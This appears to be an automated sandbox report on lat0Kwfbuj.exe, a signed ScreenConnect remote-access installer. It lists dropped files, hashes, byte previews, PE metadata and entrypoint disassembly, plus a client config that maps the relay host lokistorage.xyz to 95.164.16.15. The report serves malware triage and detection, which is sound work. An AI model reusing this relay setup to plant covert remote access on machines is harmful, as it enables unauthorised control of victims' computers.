SHA1:	E8E10065D479F8F591B9885EA8487BC673301298
SHA-256:	3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
SHA-512:	7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../....../......./......./.....n./...../../.../....../....../..-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1618597099776191
Encrypted:	false
SSDEEP:	12:JSbX72FjITSAGiLIlHVRpMh/7777777777777777777777777vDHF6hZIyFvQlpz:JyTSQI5cW+6F
MD5:	66DDC0CFC391007BEE30E499B2513F04
SHA1:	45DEED198C21E29CF250485C2057CF06A20FB156
SHA-256:	7E1B2F61DB2A141B5167BB83F001255831E1A21BB6D7436A70278A776B14AF3C
SHA-512:	923764AA6A402D927E5B00092ADAC1BB6B08BA887DFEE3E1F95330CC29B9857EA25D1941424F07D872DDC6B9FC19D9C218B5DBE8327083E303C4E29D70E9E086
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.8099886272979215
Encrypted:	false
SSDEEP:	48:d8Ph2uRc06WX4EBT52/dqNHqcq56AdubSiVkud6S2070B3uQca2iQR6YEwg4Sl59:Ah210BTa+KpKfVkud6l/XtQopASlLF
MD5:	FB890F1A0E8414434E029B25BC333FE5
SHA1:	EFD563C8E1B3EF350BB7691C65F83A8F98573C20
SHA-256:	4E8049FC7C63212735EBFFD416118610CEA1D5774409EE2400DABDB241C1A36B
SHA-512:	FFC4887E5F9B10B358D97CCE4AFFCD65C8480F1127BCAD2F7B1E5DC19CDCAA8FF64DEA760A1E2D31A5A1DFC8C775AE40CBF73FCE3BF0B249ED5CAB50C272305B
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}\DefaultIcon

Process:	C:\Windows\System32\msiexec.exe
File Type:	MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
Category:	dropped
Size (bytes):	435
Entropy (8bit):	5.289734780210945
Encrypted:	false
SSDEEP:	12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
MD5:	F34D51C3C14D1B4840AE9FF6B70B5D2F
SHA1:	C761D3EF26929F173CEB2F8E01C6748EE2249A8A
SHA-256:	0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
SHA-512:	D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
Malicious:	false
Preview:	..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	360001
Entropy (8bit):	5.362999326985519
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauf:zTtbmkExhMJCIpEO
MD5:	40B8B7AC5E679425F509918D934A67E0
SHA1:	B6F45412563328BF7C0F45D4A204DB951C94B635
SHA-256:	205C15EA047CA237BFDA8180C5A918BAE0342686AAC5D39A3AF02D08B84C5A91
SHA-512:	BF71057029F17DF42B6C158177F2B03F33B1234E8A884103F990357A87FDA60D67719EA96E8BAE0F84DE39B79C1E8E1261E248A951ABB527B27331F427E58FC8
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\fobt51ho.newcfg

Process:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	559
Entropy (8bit):	5.044847974034844
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpKozwCDsBAv/vXbAa3xT:2dL9hK6E46YPpVvH
MD5:	5EB11EA4AC03B929F59097C55E9FB620
SHA1:	F15A88FE88F22B613BE65F5F4541B3FDCF5D854F
SHA-256:	22AA1ED8B363673D20D6FA8D45E7293C048D62F6E7EF0B59352B91F78CE0E57B
SHA-512:	97C6B28E62C3EAE6AFD3C786804852EF0CD6444FF053C153E7C0CD705EFD14E4CCF7D0B0117D9ED0CF8B197B14FF437B0729C688462657EE6F8B026C83AFFEAD
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>lokistorage.xyz=95.164.16.15-12%2f11%2f2024%2017%3a40%3a17</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\user.config (copy)

Process:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	559
Entropy (8bit):	5.044847974034844
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpKozwCDsBAv/vXbAa3xT:2dL9hK6E46YPpVvH
MD5:	5EB11EA4AC03B929F59097C55E9FB620
SHA1:	F15A88FE88F22B613BE65F5F4541B3FDCF5D854F
SHA-256:	22AA1ED8B363673D20D6FA8D45E7293C048D62F6E7EF0B59352B91F78CE0E57B
SHA-512:	97C6B28E62C3EAE6AFD3C786804852EF0CD6444FF053C153E7C0CD705EFD14E4CCF7D0B0117D9ED0CF8B197B14FF437B0729C688462657EE6F8B026C83AFFEAD
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>lokistorage.xyz=95.164.16.15-12%2f11%2f2024%2017%3a40%3a17</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Process:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1590
Entropy (8bit):	5.363907225770245
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
MD5:	E88F0E3AD82AC5F6557398EBC137B0DE
SHA1:	20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
SHA-256:	278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
SHA-512:	CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture

C:\Windows\Temp\~DF2C23EF067A97D40C.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.428016723651666
Encrypted:	false
SSDEEP:	48:0peuyK+xFX49T5hUc/dqNHqcq56AdubSiVkud6S2070B3uQca2iQR6YEwg4Sl5+A:UeXeTXf+KpKfVkud6l/XtQopASlLF
MD5:	3DF1741BDC4A091D6C29A3225B4DBB73
SHA1:	F7E5796C616EF1B6A64DA5166D6A2EDD8E70D156
SHA-256:	51D8AA96E90493C1CF3FFABEF40347D0BD156A9CB54DC9751D5450E00AF55F40
SHA-512:	9CAD35B59D88AF089FFB4B2010AD911558E8515810599A2B9F381D7A360538CE05A7BDFDD23EC5ABC73EA3D5592805CA5DEEBFD08361BE4283A8A5C920B3128B
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF32E116A0135C0B38.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF38E27D837DF91FF6.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF4CA9E2C0D6BE86A3.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.428016723651666
Encrypted:	false
SSDEEP:	48:0peuyK+xFX49T5hUc/dqNHqcq56AdubSiVkud6S2070B3uQca2iQR6YEwg4Sl5+A:UeXeTXf+KpKfVkud6l/XtQopASlLF
MD5:	3DF1741BDC4A091D6C29A3225B4DBB73
SHA1:	F7E5796C616EF1B6A64DA5166D6A2EDD8E70D156
SHA-256:	51D8AA96E90493C1CF3FFABEF40347D0BD156A9CB54DC9751D5450E00AF55F40
SHA-512:	9CAD35B59D88AF089FFB4B2010AD911558E8515810599A2B9F381D7A360538CE05A7BDFDD23EC5ABC73EA3D5592805CA5DEEBFD08361BE4283A8A5C920B3128B
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5C8E17D4A657C3AB.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5FBAA14C1B1A9A2D.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.428016723651666
Encrypted:	false
SSDEEP:	48:0peuyK+xFX49T5hUc/dqNHqcq56AdubSiVkud6S2070B3uQca2iQR6YEwg4Sl5+A:UeXeTXf+KpKfVkud6l/XtQopASlLF
MD5:	3DF1741BDC4A091D6C29A3225B4DBB73
SHA1:	F7E5796C616EF1B6A64DA5166D6A2EDD8E70D156
SHA-256:	51D8AA96E90493C1CF3FFABEF40347D0BD156A9CB54DC9751D5450E00AF55F40
SHA-512:	9CAD35B59D88AF089FFB4B2010AD911558E8515810599A2B9F381D7A360538CE05A7BDFDD23EC5ABC73EA3D5592805CA5DEEBFD08361BE4283A8A5C920B3128B
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF74829D283090B3D8.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF75B8C50C72E5BDEC.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.8099886272979215
Encrypted:	false
SSDEEP:	48:d8Ph2uRc06WX4EBT52/dqNHqcq56AdubSiVkud6S2070B3uQca2iQR6YEwg4Sl59:Ah210BTa+KpKfVkud6l/XtQopASlLF
MD5:	FB890F1A0E8414434E029B25BC333FE5
SHA1:	EFD563C8E1B3EF350BB7691C65F83A8F98573C20
SHA-256:	4E8049FC7C63212735EBFFD416118610CEA1D5774409EE2400DABDB241C1A36B
SHA-512:	FFC4887E5F9B10B358D97CCE4AFFCD65C8480F1127BCAD2F7B1E5DC19CDCAA8FF64DEA760A1E2D31A5A1DFC8C775AE40CBF73FCE3BF0B249ED5CAB50C272305B
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF75DACC9C0FCBA3CC.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.06908461704519363
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKO6o2ZIAFQQvQGyVky6l3X:2F0i8n0itFzDHF6hZIyFvQE3X
MD5:	0D464A055388209C1B8CE2EED7592EF4
SHA1:	A83F7DA40EB76C4E6417A1BB723F773D597C8652
SHA-256:	D332618E2397667EE2D61B5A58B5332FA8B656E071BF40A130C2B018C65B6A28
SHA-512:	5E3EF10FB63B033FD6065DC3CF43013F209B198D7DD6DA998E71848ED6C223E8BB8372F1F8CC3BBBAEE6431630DF60B877A6E02EE636E20F7F1256AEC9ADC41A
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF7833B5F8360125C2.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8D27755718E82B8B.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.8099886272979215
Encrypted:	false
SSDEEP:	48:d8Ph2uRc06WX4EBT52/dqNHqcq56AdubSiVkud6S2070B3uQca2iQR6YEwg4Sl59:Ah210BTa+KpKfVkud6l/XtQopASlLF
MD5:	FB890F1A0E8414434E029B25BC333FE5
SHA1:	EFD563C8E1B3EF350BB7691C65F83A8F98573C20
SHA-256:	4E8049FC7C63212735EBFFD416118610CEA1D5774409EE2400DABDB241C1A36B
SHA-512:	FFC4887E5F9B10B358D97CCE4AFFCD65C8480F1127BCAD2F7B1E5DC19CDCAA8FF64DEA760A1E2D31A5A1DFC8C775AE40CBF73FCE3BF0B249ED5CAB50C272305B
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB4DC3C5047951705.TMP

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	0.2385737235825634
Encrypted:	false
SSDEEP:	48:dSUDBAdubS3qcq56AdubSiVkud6S2070B3uQca2iQR6YEwg4Sl5+rM4qE/:ssxpKfVkud6l/XtQopASl74
MD5:	E5553450BC62293C035A52BE0C41E8F0
SHA1:	87E79A7AA85CB0756FC3ABC87FB5ED22DBB15E4E
SHA-256:	CD634C4877E39DE40FB89DE0EB60C1672F030F8046ADF0486EF4EC3BAE77963E
SHA-512:	5CC4592B2E899DD70F027E1B62F034C783E43FF9657FBEB64C377E11B7A2EE0AA678E01127C9B4EB0700B863E89DFF4CCDE7DB572180313A9F40288313D530DB
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.431214976564894
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	lat0Kwfbuj.exe
File size:	5'639'944 bytes
MD5:	51f8a6e0438ee3b616c5768326a30ede
SHA1:	4f46a0f80fd001cff87f747ce43551aae8da15c4
SHA256:	723553540a5bdd7ae07408bceef12e9b4feb1b572a5c0d30c251fe2bdf4bc5bf
SHA512:	8a97063816d8312bac5834129b8c37f106be3c9bf64bbd4994f9fa2ec360d9ee84fc0555de04a96dce23f17171fe74c40185e8a1526a42709d97c654402a57fc
SSDEEP:	98304:Z4s6efPOEnXkHywo+EVhaecMUzG4uc96ob2:afefPFZs6Uruc9Xb
TLSH:	9146E001B3D599B9D5BF0678D87A42695A34BC048316CBFF97D0BD292E32BC04E32766
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4014ad
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	9771ee6344923fa220489ab01239bdfd

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	17/08/2022 02:00:00 16/08/2025 01:59:59
Subject Chain	CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Version:	3
Thumbprint MD5:	AAE704EC2810686C3BF7704E660AFB5D
Thumbprint SHA-1:	4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Thumbprint SHA-256:	82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
Serial:	0B9360051BCCF66642998998D5BA97CE

Entrypoint Preview

Instruction
call 00007F55D4521D4Ah
jmp 00007F55D45217FFh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040D040h]
push dword ptr [ebp+08h]
call dword ptr [0040D03Ch]
push C0000409h
call dword ptr [0040D044h]
push eax
call dword ptr [0040D048h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040D04Ch]
test eax, eax
je 00007F55D4521987h
push 00000002h
pop ecx
int 29h
mov dword ptr [004148D8h], eax
mov dword ptr [004148D4h], ecx
mov dword ptr [004148D0h], edx
mov dword ptr [004148CCh], ebx
mov dword ptr [004148C8h], esi
mov dword ptr [004148C4h], edi
mov word ptr [004148F0h], ss
mov word ptr [004148E4h], cs
mov word ptr [004148C0h], ds
mov word ptr [004148BCh], es
mov word ptr [004148B8h], fs
mov word ptr [004148B4h], gs
pushfd
pop dword ptr [004148E8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004148DCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004148E0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004148ECh], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00414828h], 00010001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729
[IMP] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x129c4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16000	0x53747c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x54a600	0x16908
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x54e000	0xea8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11f20	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x11e60	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xd000	0x13c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb1af	0xb200	d9fa6da0baf4b869720be833223490cb	False	0.6123156601123596	data	6.592039633797327	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xd000	0x6078	0x6200	8b45a1035c0de72f910a75db7749f735	False	0.41549744897959184	data	4.786621464556291	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x14000	0x11e4	0x800	1f4cc86b6735a74429c9d1feb93e2871	False	0.18310546875	data	2.265083745848167	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x16000	0x53747c	0x537600	9031d2d9e81b0f6feb6373861cf5cdaa	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x54e000	0xea8	0x1000	a93b0f39998e1e69e5944da8c5ff06b1	False	0.72265625	data	6.301490309336801	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
FILES	0x163d4	0x85600	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows			0.3967589473992502
FILES	0x9b9d4	0x1a4400	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows			0.5110044479370117
FILES	0x23fdd4	0x1ac00	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows			0.44113244742990654
FILES	0x25a9d4	0x2f1320	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows			0.9811086654663086
FILES	0x54bcf4	0x1600	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows			0.3908025568181818
RT_MANIFEST	0x54d2f4	0x188	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5892857142857143

Imports

DLL	Import
mscoree.dll	CorBindToRuntimeEx
